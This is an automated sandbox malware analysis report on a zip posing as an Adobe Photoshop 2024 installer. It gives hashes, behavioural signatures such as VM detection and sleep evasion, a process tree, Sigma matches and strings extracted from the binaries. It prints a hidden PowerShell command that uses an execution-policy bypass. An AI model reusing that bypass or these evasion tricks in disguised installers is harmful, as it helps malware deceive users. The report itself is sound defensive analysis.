Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Adobe_Photoshop_2024 (1).zip

Overview

General Information

Sample name:Adobe_Photoshop_2024 (1).zip
Analysis ID:1509259
MD5:37c3d10abf89febf3f2ad91f16c39f51
SHA1:4325fabfa5e1d2b58926274354b3466aef8bd3b3
SHA256:802f0d869b63e4302dfeff1905708232402373d308cc112130593ed428b6a667
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Bypasses PowerShell execution policy
Loading BitLocker PowerShell Module
Suspicious powershell command line found
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SGDT)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • unarchiver.exe (PID: 4208 cmdline: "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\Adobe_Photoshop_2024 (1).zip" MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2)
    • 7za.exe (PID: 2460 cmdline: "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg" "C:\Users\user\Desktop\Adobe_Photoshop_2024 (1).zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
      • conhost.exe (PID: 3712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1472 cmdline: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Adobe_Photoshop_2024.exe (PID: 4268 cmdline: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe MD5: D71C5F6E1CBCC6AB812D3433FFF7BE31)
        • powershell.exe (PID: 2364 cmdline: "powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -Command "(Get-CimInstance -ClassName Win32_VideoController).Caption;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 6352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -Command "(Get-CimInstance -ClassName Win32_VideoController).Caption;", CommandLine: "powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -Command "(Get-CimInstance -ClassName Win32_VideoController).Caption;", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe, ParentImage: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe, ParentProcessId: 4268, ParentProcessName: Adobe_Photoshop_2024.exe, ProcessCommandLine: "powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -Command "(Get-CimInstance -ClassName Win32_VideoController).Caption;", ProcessId: 2364, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -Command "(Get-CimInstance -ClassName Win32_VideoController).Caption;", CommandLine: "powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -Command "(Get-CimInstance -ClassName Win32_VideoController).Caption;", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe, ParentImage: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe, ParentProcessId: 4268, ParentProcessName: Adobe_Photoshop_2024.exe, ProcessCommandLine: "powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -Command "(Get-CimInstance -ClassName Win32_VideoController).Caption;", ProcessId: 2364, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
Source: Binary string: D:\Red Zion Simple Shop\svn\SimpleShop\trunk\SShop.Data\obj\Release\SShop.Data.pdb source: SShop.Data.dll
Source: Binary string: AdobeOwl.pdb source: AdobeOwl.dll
Source: Binary string: D:\Red Zion Simple Shop\svn\SimpleShop\trunk\SShop.Business\obj\Release\SShop.Business.pdb[ source: Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dll
Source: Binary string: E:\workspace\RT_Win_8_0\Mainline\public\binary\Win\x64\Release\AdobePIP.pdb source: AdobePIP.dll
Source: Binary string: D:\Red Zion Simple Shop\svn\SimpleShop\trunk\SShop.Business\obj\Release\SShop.Business.pdb source: Adobe_Photoshop_2024.exe, Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dll
Source: Binary string: G:\Dev\NPoco\src\NPoco\obj\release\net461\NPoco.pdb source: Adobe_Photoshop_2024.exe, Adobe_Photoshop_2024.exe, 00000006.00000002.2107871205.0000000007402000.00000002.00000001.01000000.00000011.sdmp, NPoco.dll
Source: Binary string: \??\C:\Windows\symbols\dll\SShop.Data.pdbo source: Adobe_Photoshop_2024.exe, 00000006.00000002.2101418445.0000000000F23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\bamboo-agent-home\xml-data\build-dir\CS-X64REL12-BREL\x64\Release\SDK5App.pdb source: PhotoshopCloud.dll
Source: Binary string: E:\PS\PS20\Win64_Release\20190227.r.76\photoshop\main\photoshop\Targets\x64\Release\PSViews.pdb source: PhotoshopViews.dll
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Ninject.PDB source: Adobe_Photoshop_2024.exe, 00000006.00000002.2101418445.0000000000F55000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\workspace\RT_Win_8_0\Mainline\public\binary\Win\x64\Release\AdobePIP.pdb<< source: AdobePIP.dll
Source: Binary string: C:\projects\ninject\src\Ninject\obj\Release\net45\Ninject.pdbR6 source: Ninject.dll
Source: Binary string: \??\C:\Windows\symbols\dll\SShop.Data.pdbr source: Adobe_Photoshop_2024.exe, 00000006.00000002.2101418445.0000000000F23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\ninject\src\Ninject\obj\Release\net45\Ninject.pdb source: Ninject.dll
Source: Binary string: D:\Red Zion Simple Shop\svn\SimpleShop\trunk\Contracts\obj\Release\SShop.Contracts.pdb source: SShop.Contracts.dll
Source: Binary string: \??\C:\Windows\symbols\exe\InvoiceOfflineImport.pdb source: Adobe_Photoshop_2024.exe, 00000006.00000002.2101418445.0000000000F23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\PS\PS20\Win64_Release\20190227.r.76\photoshop\main\photoshop\Targets\x64\Release\Photoshop.pdb source: Photoshop.dll
Source: Binary string: G:\Dev\NPoco\src\NPoco\obj\release\net461\NPoco.pdbSHA256 source: Adobe_Photoshop_2024.exe, 00000006.00000002.2107871205.0000000007402000.00000002.00000001.01000000.00000011.sdmp, NPoco.dll
Source: Binary string: D:\Red Zion Simple Shop\svn\SimpleShop\trunk\InvoiceOfflineImport\obj\x86\Release\InvoiceOfflineImport.pdb6 source: Adobe_Photoshop_2024.exe, 00000006.00000002.2101418445.0000000000F23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Red Zion Simple Shop\svn\SimpleShop\trunk\InvoiceOfflineImport\obj\x86\Release\InvoiceOfflineImport.pdb source: Adobe_Photoshop_2024.exe
Source: Photoshop.dllString found in binary or memory: $$$/private/Witticisms/1600=You are about to be linked to the mothership.^rIf you want to fly solo, hold down the Opt key next time.6$$$/private/Witticisms/1521=Email threads of insanity!D$$$/private/Witticisms/1520=Director of Photoshop Produce Management\$$$/private/Witticisms/1511=No screams or profanity...^rhe must not have opened my code yet.H$$$/private/Witticisms/1510=Sometimes, when I get bored, I troll myself.b$$$/private/Witticisms/150A=We^}ve become professional bottlenecks.^rCan we add that on Linked-In?@$$$/private/Witticisms/1509=In their world, sanity doesn^}t ruleW$$$/private/Witticisms/1508=This would be a great job if it weren^}t for the computers.C$$$/private/Witticisms/1507=There! Fixed it like a vet fixes a dog.K$$$/private/Witticisms/1506=Call in the League of Extraordinary Douchebags!J$$$/private/Witticisms/1505=She wants 143, so she can have a prime number.v$$$/private/Witticisms/1504=It^}s the little things like the color pickle^rthat make it worth coming to work each day.:$$$/private/Witticisms/1503=Virtual Hug! Virtual Highfive!=$$$/private/Witticisms/1502=Yeah South Park, we love you too.N$$$/private/Witticisms/1501=I need to send out an email that no one will read.0$$$/private/Witticisms/1500=OMG, the Hue-cumber!;$$$/private/Witticisms/1426=I^}ve got that syncing feeling.S$$$/private/Witticisms/1425=I don^}t want the automated hatemail from our sysadmin.e$$$/private/Witticisms/1424=After this ships,^rI never want to nudge another anchor point in my life!Q$$$/private/Witticisms/1423=What is Abe Lincoln doing with all those quadcopters?<$$$/private/Witticisms/1422=Yak shaving and crank turning...B$$$/private/Witticisms/1421=This is less scrummy, and more scummy.8$$$/private/Witticisms/1420=QE has been peanut buttered.I$$$/private/Witticisms/1415=It^}s not an edge, imagine a rusty saw blade.5$$$/private/Witticisms/1414=Must be conscious to win.A$$$/private/Witticisms/1413=Wait ten seconds to avoid combustion.?$$$/private/Witticisms/1412=Is my head physically spinning yet?0$$$/private/Witticisms/1411=ToTest, NeedLessInfoJ$$$/private/Witticisms/1410=Is that Trello or Hearthstone on your desktop?L$$$/private/Witticisms/1408=I didn^}t want to bite myself in the face later.G$$$/private/Witticisms/1407=Tinsel was hung by the toolbar with care...>$$$/private/Witticisms/1406=Cesium is very fun in the bathtub.?$$$/private/Witticisms/1405=Slider values should go to awesome.<$$$/private/Witticisms/1404=Reentrant is a four letter word.O$$$/private/Witticisms/1403=We will want to uppity that after the dirt release.t$$$/private/Witticisms/1402=It^}s like noting that the third floor window is unlocked,^rwhen the front door is, too.J$$$/private/Witticisms/1401=The day the cash cow adopted a white elephant.8$$$/private/Witticisms/1400=Our Goddess broke the build!J$$$/private/Witticisms/1311=Let^}s see what the OCD has to say about that.2$$$/private/Witticisms/1310=The Last Of The Icons!R$$$/private/Witticisms/130A=She^}s gonna slug me.^r
Source: AdobePIP.dll, Photoshop.dll, PhotoshopCloud.dll, PhotoshopViews.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: AdobePIP.dll, Photoshop.dll, PhotoshopCloud.dll, PhotoshopViews.dllString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: Adobe_Photoshop_2024.exe, NPoco.dll, Ninject.dll, SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dll, SShop.DiagramNet.dllString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000008.00000002.2097751985.0000000008AA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso9
Source: Adobe_Photoshop_2024.exe, NPoco.dll, Ninject.dll, SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dll, SShop.DiagramNet.dllString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: Adobe_Photoshop_2024.exe, NPoco.dll, Ninject.dll, SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dll, SShop.DiagramNet.dllString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dllString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dllString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: Adobe_Photoshop_2024.exe, NPoco.dll, Ninject.dll, SShop.DiagramNet.dllString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: AdobePIP.dll, Photoshop.dll, PhotoshopCloud.dll, PhotoshopViews.dllString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: AdobePIP.dll, Photoshop.dll, PhotoshopCloud.dll, PhotoshopViews.dllString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: AdobePIP.dll, Photoshop.dll, PhotoshopCloud.dll, PhotoshopViews.dllString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: AdobePIP.dll, Photoshop.dll, PhotoshopCloud.dll, PhotoshopViews.dllString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: Adobe_Photoshop_2024.exe, NPoco.dll, Ninject.dll, SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dll, SShop.DiagramNet.dllString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: Adobe_Photoshop_2024.exe, NPoco.dll, Ninject.dll, SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dll, SShop.DiagramNet.dllString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dllString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dllString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: Adobe_Photoshop_2024.exe, NPoco.dll, Ninject.dll, SShop.DiagramNet.dllString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Photoshop.dllString found in binary or memory: http://developer.download.nvidia.com/shaderlibrary/docs/shadow_PCSS.pdf
Source: SShop.Business.dllString found in binary or memory: http://moj.minimax.si/ip/doc/schemas/miniMAXUvozKnjigovodstvo
Source: Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllString found in binary or memory: http://moj.minimax.si/ip/doc/schemas/miniMAXUvozKnjigovodstvoT
Source: powershell.exe, 00000008.00000002.2093251897.0000000006417000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Adobe_Photoshop_2024.exe, NPoco.dll, Ninject.dll, SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dll, SShop.DiagramNet.dllString found in binary or memory: http://ocsp.comodoca.com0
Source: AdobePIP.dll, Photoshop.dll, PhotoshopCloud.dll, PhotoshopViews.dllString found in binary or memory: http://ocsp.digicert.com0H
Source: AdobePIP.dll, Photoshop.dll, PhotoshopCloud.dll, PhotoshopViews.dllString found in binary or memory: http://ocsp.digicert.com0I
Source: Adobe_Photoshop_2024.exe, NPoco.dll, Ninject.dll, SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dll, SShop.DiagramNet.dllString found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000008.00000002.2091411811.0000000005507000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: AdobePIP.dll, Photoshop.dll, PhotoshopCloud.dll, PhotoshopViews.dllString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: AdobePIP.dll, Photoshop.dll, PhotoshopCloud.dll, PhotoshopViews.dllString found in binary or memory: http://s.symcd.com06
Source: SShop.Business.dllString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: powershell.exe, 00000008.00000002.2091411811.00000000053B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AdobePIP.dll, Photoshop.dll, PhotoshopCloud.dll, PhotoshopViews.dllString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: AdobePIP.dll, Photoshop.dll, PhotoshopCloud.dll, PhotoshopViews.dllString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: AdobePIP.dll, Photoshop.dll, PhotoshopCloud.dll, PhotoshopViews.dllString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Adobe_Photoshop_2024.exeString found in binary or memory: http://uri.etsi.org/01903/v1.1.1#
Source: Adobe_Photoshop_2024.exe, Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllString found in binary or memory: http://uri.etsi.org/01903/v1.1.1#SignedProperties
Source: Adobe_Photoshop_2024.exe, Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllString found in binary or memory: http://vizualiziraj.si/eInvoiceVizualization_20110530.xslt
Source: Photoshop.dllString found in binary or memory: http://wolframalpha.com
Source: powershell.exe, 00000008.00000002.2091411811.0000000005507000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Adobe_Photoshop_2024.exe, Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllString found in binary or memory: http://www.bizbox.eu/XSL/2019/06/visualization_eSlog20_bizBox_SL_rev.xslt
Source: AdobePIP.dll, Photoshop.dll, PhotoshopCloud.dll, PhotoshopViews.dllString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: Adobe_Photoshop_2024.exe, Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllString found in binary or memory: http://www.ecb.europa.eu/stats/eurofxref/eurofxref-daily.xml
Source: SShop.Business.dllString found in binary or memory: http://www.fu.gov.si/
Source: Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllString found in binary or memory: http://www.fu.gov.si/&
Source: SShop.Business.XmlSerializers.dllString found in binary or memory: http://www.fu.gov.si/-BusinessPremiseRequest
Source: Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllString found in binary or memory: http://www.fu.gov.si/3
Source: Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllString found in binary or memory: http://www.fu.gov.si/9
Source: SShop.Business.XmlSerializers.dllString found in binary or memory: http://www.fu.gov.si/:BusinessPremiseResponseEhttp://www.fu.gov.si/:EchoResponse
Source: SShop.Business.XmlSerializers.dllString found in binary or memory: http://www.fu.gov.si/:DateTime
Source: SShop.Business.XmlSerializers.dllString found in binary or memory: http://www.fu.gov.si/:Error
Source: SShop.Business.XmlSerializers.dllString found in binary or memory: http://www.fu.gov.si/:ErrorCode
Source: SShop.Business.XmlSerializers.dllString found in binary or memory: http://www.fu.gov.si/:ErrorMessage
Source: SShop.Business.XmlSerializers.dllString found in binary or memory: http://www.fu.gov.si/:Header
Source: SShop.Business.XmlSerializers.dllString found in binary or memory: http://www.fu.gov.si/:InvoiceResponse
Source: SShop.Business.XmlSerializers.dllString found in binary or memory: http://www.fu.gov.si/:MessageID
Source: SShop.Business.XmlSerializers.dllString found in binary or memory: http://www.fu.gov.si/:UniqueInvoiceID
Source: Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllString found in binary or memory: http://www.fu.gov.si/T
Source: Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllString found in binary or memory: http://www.fu.gov.si/uhttp://vizualiziraj.si/eInvoiceVizualization_20110530.xslt
Source: Adobe_Photoshop_2024.exeString found in binary or memory: http://www.gzs.si/e-poslovanje/sheme/eSLOG_1-5_EnostavniRacun.xsd
Source: Adobe_Photoshop_2024.exeString found in binary or memory: http://www.gzs.si/e-poslovanje/sheme/eSLOG_1-6_EnostavniRacun.xsd
Source: Adobe_Photoshop_2024.exeString found in binary or memory: http://www.gzs.si/shemas/eslog/racun/1.6#Racun
Source: Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllString found in binary or memory: http://www.gzs.si/shemas/eslog/racun/1.6#RacunChttp://uri.etsi.org/01903/v1.1.1#
Source: powershell.exe, 00000008.00000002.2091411811.00000000053B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: SShop.Business.dllString found in binary or memory: https://blagajne-test.fu.gov.si:9002/v1/cash_registers
Source: Adobe_Photoshop_2024.exeString found in binary or memory: https://blagajne.fu.gov.si:9003/v1/cash_registers
Source: Adobe_Photoshop_2024.exeString found in binary or memory: https://blagajne.fu.gov.si:9009/v1/cash_registers
Source: Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllString found in binary or memory: https://blagajne.fu.gov.si:9009/v1/cash_registerschttps://blagajne.fu.gov.si:9003/v1/cash_registersK
Source: powershell.exe, 00000008.00000002.2093251897.0000000006417000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2093251897.0000000006417000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2093251897.0000000006417000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: AdobePIP.dll, Photoshop.dll, PhotoshopCloud.dll, PhotoshopViews.dllString found in binary or memory: https://d.symcb.com/cps0%
Source: AdobePIP.dll, Photoshop.dll, PhotoshopCloud.dll, PhotoshopViews.dllString found in binary or memory: https://d.symcb.com/rpa0
Source: AdobePIP.dll, Photoshop.dll, PhotoshopCloud.dll, PhotoshopViews.dllString found in binary or memory: https://d.symcb.com/rpa0.
Source: powershell.exe, 00000008.00000002.2091411811.0000000005507000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: Ninject.dllString found in binary or memory: https://github.com/ninject/Ninject
Source: powershell.exe, 00000008.00000002.2091411811.0000000005AA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.2093251897.0000000006417000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: Adobe_Photoshop_2024.exe, NPoco.dll, Ninject.dll, SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dll, SShop.DiagramNet.dllString found in binary or memory: https://sectigo.com/CPS0
Source: AdobePIP.dll, Photoshop.dll, PhotoshopCloud.dll, PhotoshopViews.dllString found in binary or memory: https://www.digicert.com/CPS0
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_01334A886_2_01334A88
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_0525BF916_2_0525BF91
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_0561A68F6_2_0561A68F
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_074063C16_2_074063C1
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_0740756C6_2_0740756C
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_0575D4EA6_2_0575D4EA
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_0575B9686_2_0575B968
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_05FE5CD86_2_05FE5CD8
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_05FE9CB06_2_05FE9CB0
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_0740A56F6_2_0740A56F
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_013320506_2_01332050
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_056177FF6_2_056177FF
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_05775DD56_2_05775DD5
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeCode function: 6_2_057720506_2_05772050
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04E765808_2_04E76580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04E7B6C88_2_04E7B6C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04E7B6B98_2_04E7B6B9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04E7EB808_2_04E7EB80
Source: Ninject.dll.2.dr, ISelector.csSuspicious method names: ..SelectMethodsForInjection
Source: Ninject.dll.2.dr, ISelector.csSuspicious method names: ..SelectConstructorsForInjection
Source: Ninject.dll.2.dr, ISelector.csSuspicious method names: ..SelectPropertiesForInjection
Source: Ninject.dll.2.dr, ActivationBlock.csSuspicious method names: .ActivationBlock.Inject
Source: Ninject.dll.2.dr, NinjectModule.csSuspicious method names: .NinjectModule.VerifyRequiredModulesAreLoaded
Source: Ninject.dll.2.dr, NinjectModule.csSuspicious method names: .NinjectModule.OnVerifyRequiredModules
Source: Ninject.dll.2.dr, NinjectModule.csSuspicious method names: .NinjectModule.RemoveBinding
Source: Ninject.dll.2.dr, NinjectModule.csSuspicious method names: .NinjectModule.AddBinding
Source: Ninject.dll.2.dr, NinjectModule.csSuspicious method names: .NinjectModule.Load
Source: Ninject.dll.2.dr, NinjectModule.csSuspicious method names: .NinjectModule.Unbind
Source: Ninject.dll.2.dr, NinjectModule.csSuspicious method names: .NinjectModule.OnLoad
Source: Ninject.dll.2.dr, NinjectModule.csSuspicious method names: .NinjectModule.OnUnload
Source: Ninject.dll.2.dr, NinjectModule.csSuspicious method names: .NinjectModule.Unload
Source: Ninject.dll.2.dr, IBindingWhenSyntax.csSuspicious method names: ..WhenInjectedInto
Source: Ninject.dll.2.dr, IBindingWhenSyntax.csSuspicious method names: ..WhenInjectedExactlyInto
Source: Ninject.dll.2.dr, Selector.csSuspicious method names: .Selector.SelectConstructorsForInjection
Source: Ninject.dll.2.dr, Selector.csSuspicious method names: .Selector.SelectPropertiesForInjection
Source: Ninject.dll.2.dr, Selector.csSuspicious method names: .Selector.SelectMethodsForInjection
Source: Adobe_Photoshop_2024.exe.2.dr, InvoiceOfflineNinjectmodule.csSuspicious method names: .InvoiceOfflineNinjectmodule.Load
Source: Ninject.dll.2.dr, IInjectionHeuristic.csSuspicious method names: ..ShouldInject
Source: Ninject.dll.2.dr, BindingBuilder.csSuspicious method names: .ConstructorArgumentSyntax.Inject
